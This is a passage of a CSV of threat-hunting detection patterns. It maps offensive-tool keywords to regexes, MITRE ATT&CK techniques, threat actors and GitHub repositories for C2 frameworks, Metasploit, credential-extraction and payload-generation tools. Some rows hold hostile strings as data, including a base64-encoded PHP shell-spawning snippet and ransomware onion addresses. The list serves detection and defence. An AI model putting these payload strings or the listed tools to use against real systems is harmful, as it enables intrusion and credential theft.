layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","N/A","10","","N/A","","","","54533" "*payload_spellshell.c*",".{0,1000}payload_spellshell\.c.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","54534" "*payload_spellshell.exe*",".{0,1000}payload_spellshell\.exe.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","54535" "*payload_tidy.rb*",".{0,1000}payload_tidy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54536" "*Payload_Type/freyja/*",".{0,1000}Payload_Type\/freyja\/.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","54537" "*PayloadCommsHost*",".{0,1000}PayloadCommsHost.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","54538" 
"*--payload-cookie*",".{0,1000}\-\-payload\-cookie.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","54539" "*Payload-Download-Cradles*",".{0,1000}Payload\-Download\-Cradles.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0011 - TA0009","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","N/A","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","54540" "*PayloadFormat.ASSEMBLY*",".{0,1000}PayloadFormat\.ASSEMBLY.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54541" "*PayloadFormat.DLL*",".{0,1000}PayloadFormat\.DLL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54542" "*PayloadFormat.EXE*",".{0,1000}PayloadFormat\.EXE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54543" "*PayloadFormat.POWERSHELL*",".{0,1000}PayloadFormat\.POWERSHELL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54544" "*PayloadFormat.SHELLCODE*",".{0,1000}PayloadFormat\.SHELLCODE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54545" "*PayloadFormat.SVC_EXE*",".{0,1000}PayloadFormat\.SVC_EXE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54546" "*PayloadGen v2.0 - by @JoelGMSec*",".{0,1000}PayloadGen\sv2\.0\s\-\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","54547" "*payloadgenerator.py*",".{0,1000}payloadgenerator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54548" "*Payload-Generator/trix-back-gen.zip*",".{0,1000}Payload\-Generator\/trix\-back\-gen\.zip.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","54549" "*payloads/Follina*",".{0,1000}payloads\/Follina.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","54550" "*payloads/Powershell*",".{0,1000}payloads\/Powershell.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","54551" "*payloads/shellcodes*",".{0,1000}payloads\/shellcodes.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","54552" "*payloads\payloadx64.bin*",".{0,1000}payloads\\payloadx64\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","54553" "*payloads\payloadx86.bin*",".{0,1000}payloads\\payloadx86\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","54554" "*payloads_examples*calc.js*",".{0,1000}payloads_examples.{0,1000}calc\.js.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","54555" "*payloads_examples*calc.xll*",".{0,1000}payloads_examples.{0,1000}calc\.xll.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","54556" "*PayloadsAllTheThings*",".{0,1000}PayloadsAllTheThings.{0,1000}","offensive_tool_keyword","PayloadsAllTheThings","A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! 
","T1210 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Bo0oM/PayloadsAllTheThings","1","1","N/A","N/A","N/A","1","3","4","2019-02-11T06:34:14Z","2019-02-11T06:29:45Z","54557" "*PayloadService.*",".{0,1000}PayloadService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54558" "*--payload-type Macro*",".{0,1000}\-\-payload\-type\sMacro.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","54559" "*PayloadType.BIND_PIPE*",".{0,1000}PayloadType\.BIND_PIPE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54560" "*PayloadType.EXTERNAL*",".{0,1000}PayloadType\.EXTERNAL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54561" 
"*PayloadType.HTTP*",".{0,1000}PayloadType\.HTTP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54562" "*PayloadType.REVERSE_TCP*",".{0,1000}PayloadType\.REVERSE_TCP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54563" "*--payload-url */pwn.html",".{0,1000}\-\-payload\-url\s.{0,1000}\/pwn\.html","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","54564" "*payorgz3j6hs2gj66nk6omfw65atgmqwzxqbbxnqi3bv2mlwgcirunad.onion*",".{0,1000}payorgz3j6hs2gj66nk6omfw65atgmqwzxqbbxnqi3bv2mlwgcirunad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54566" "*pb36hu4spl6cyjdfhing7h3pw6dhpk32ifemawkujj4gp33ejzdq3did.onion*",".{0,1000}pb36hu4spl6cyjdfhing7h3pw6dhpk32ifemawkujj4gp33ejzdq3did\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54567" "*pc_ip = Invoke-WebRequest -Uri ""https://api.ipify.org"" -UseBasicParsing*",".{0,1000}pc_ip\s\=\sInvoke\-WebRequest\s\-Uri\s\""https\:\/\/api\.ipify\.org\""\s\-UseBasicParsing.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","54569" "*pcap_linktypes.py*",".{0,1000}pcap_linktypes\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54570" "*pcap2john.py*",".{0,1000}pcap2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54571" "*pcapfile.py*",".{0,1000}pcapfile\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54572" "*PcapXray*",".{0,1000}PcapXray.{0,1000}","offensive_tool_keyword","PcapXray","Given a Pcap File. plot a network diagram displaying hosts in the network. network traffic. highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.","T1040 - T1071 - T1070 - T1074 - T1075 - T1078 - T1048","TA0001 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Srinivas11789/PcapXray","1","1","N/A","N/A","N/A","10","1717","281","2022-03-28T15:31:26Z","2017-10-02T04:47:51Z","54573" "*Pcredz -d *",".{0,1000}Pcredz\s\-d\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","N/A","10","2100","413","2025-01-27T10:34:00Z","2014-04-07T02:03:33Z","54592" "*Pcredz -f *",".{0,1000}Pcredz\s\-f\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","N/A","10","2100","413","2025-01-27T10:34:00Z","2014-04-07T02:03:33Z","54593" "*PCredz -f *.pcap*",".{0,1000}PCredz\s\-f\s.{0,1000}\.pcap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54594" "*Pcredz -i *",".{0,1000}Pcredz\s\-i\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","N/A","10","2100","413","2025-01-27T10:34:00Z","2014-04-07T02:03:33Z","54595" "*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*",".{0,1000}PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","54597" "*PD9waHAKcGNudGxfZXhlYygnL2Jpbi9zaCcsIFsnLXAnXSk7Cj8*",".{0,1000}PD9waHAKcGNudGxfZXhlYygnL2Jpbi9zaCcsIFsnLXAnXSk7Cj8.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","54598" "*pdadjkfkgcafgbceimcpbkalnfnepbnk*",".{0,1000}pdadjkfkgcafgbceimcpbkalnfnepbnk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","54599" "*PDF_Payload*Doomfist.pdf*",".{0,1000}PDF_Payload.{0,1000}Doomfist\.pdf.{0,1000}","offensive_tool_keyword","Mystikal","macOS 
Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","54602" "*pdf2john.pl*",".{0,1000}pdf2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54603" "*pdfcrack -f *.pdf*",".{0,1000}pdfcrack\s\-f\s.{0,1000}\.pdf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54604" "*pdf-exploit-main.zip*",".{0,1000}pdf\-exploit\-main\.zip.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","1","N/A","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","54605" "*PDONUT_INSTANCE*",".{0,1000}PDONUT_INSTANCE.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","54606" "*pe_inject.rb*",".{0,1000}pe_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
